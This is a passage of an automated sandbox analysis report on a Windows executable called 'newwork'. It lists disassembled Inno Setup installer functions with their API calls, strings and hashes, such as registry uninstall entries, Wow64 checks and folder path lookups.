                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                        • String ID:
                                                                                        • API String ID: 873889042-0
                                                                                        • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                        • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                        • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                        • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                        • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstanceVersion
                                                                                        • String ID:
                                                                                        • API String ID: 1462612201-0
                                                                                        • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                        • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                        • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                        • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                        • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                        • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                        • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                        • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                        • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                        • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                        • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                        • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                        • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                        • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                        • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                        • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                         Control-flow Graph
                                                                                         • (graph rendering not reproduced; nodes are marked Executed / Not Executed)
                                                                                        APIs
                                                                                          • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                          • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                        • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Close
                                                                                        • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                        • API String ID: 3391052094-3342197833
                                                                                        • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                        • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                        • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                        • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                         Control-flow Graph
                                                                                         • (graph rendering not reproduced; nodes are marked Executed / Not Executed)
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                        • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindSleepWindow
                                                                                        • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                        • API String ID: 3078808852-3310373309
                                                                                        • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                        • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                        • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                        • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

Control-flow Graph
control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1634 483ac8-483acc 1625->1634 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1632 483b29-483b46 1628->1632 1633 483b3d-483b44 1628->1633 1629->1630 1632->1630 1633->1630 1634->1624 1636 483ace-483ad5 call 45271c 1634->1636 1636->1624 1639 483ad7-483ae4 GetProcAddress 1636->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
• GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
• GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
• GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
• String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
• API String ID: 2230631259-2623177817
• Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
• Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
• Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
• Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

Control-flow Graph
control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1688 468e84 1668->1688 1671 468e94-468eb9 call 42dd4c * 2 1669->1671 1672 468eeb-468ef2 1669->1672 1691 468ebb-468ec4 call 4314f8 1671->1691 1692 468ec9-468edb call 42dd4c 1671->1692 1674 468ef4-468f06 call 42dd4c 1672->1674 1675 468f38-468f3f 1672->1675 1689 468f16-468f28 call 42dd4c 1674->1689 1690 468f08-468f11 call 4314f8 1674->1690 1677 468f41-468f75 call 42dd4c * 3 1675->1677 1678 468f7a-468f90 RegCloseKey 1675->1678 1677->1678 1688->1669 1689->1675 1700 468f2a-468f33 call 4314f8 1689->1700 1690->1689 1691->1692 1692->1672 1704 468edd-468ee6 call 4314f8 1692->1704 1700->1675 1704->1672
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
Strings
• Inno Setup: User Info: Organization, xrefs: 00468F5A
• Inno Setup: Deselected Tasks, xrefs: 00468F19
• Inno Setup: User Info: Name, xrefs: 00468F47
• %s\%s_is1, xrefs: 00468E05
• Inno Setup: App Path, xrefs: 00468E4A
• Inno Setup: No Icons, xrefs: 00468E73
• Inno Setup: Selected Components, xrefs: 00468EAA
• Inno Setup: Selected Tasks, xrefs: 00468EF7
• Inno Setup: Deselected Components, xrefs: 00468ECC
• Inno Setup: User Info: Serial, xrefs: 00468F6D
• Inno Setup: Icon Group, xrefs: 00468E66
• Inno Setup: Setup Type, xrefs: 00468E9A
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1093091907
• Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
• Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
• Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
• Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

Control-flow Graph
APIs
  • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
  • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
• SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
• CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
  • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
• API String ID: 3771764029-544719455
• Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
• Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
• Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
• Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

Control-flow Graph
control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
APIs
  • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
• GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
• RegisterClassA.USER32(00499630), ref: 004238B7
• GetSystemMetrics.USER32(00000000), ref: 004238D9
• GetSystemMetrics.USER32(00000001), ref: 004238E8
• SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
• SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
• GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
• DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
• DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
• String ID: |6B
• API String ID: 183575631-3009739247
• Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
• Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
• Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
• Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

Control-flow Graph
control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1999 47cefb-47cf01 1994->1999 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1999->1991 1999->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
APIs
• GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047CF7A
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
• API String ID: 190572456-256906917
• Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
• Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
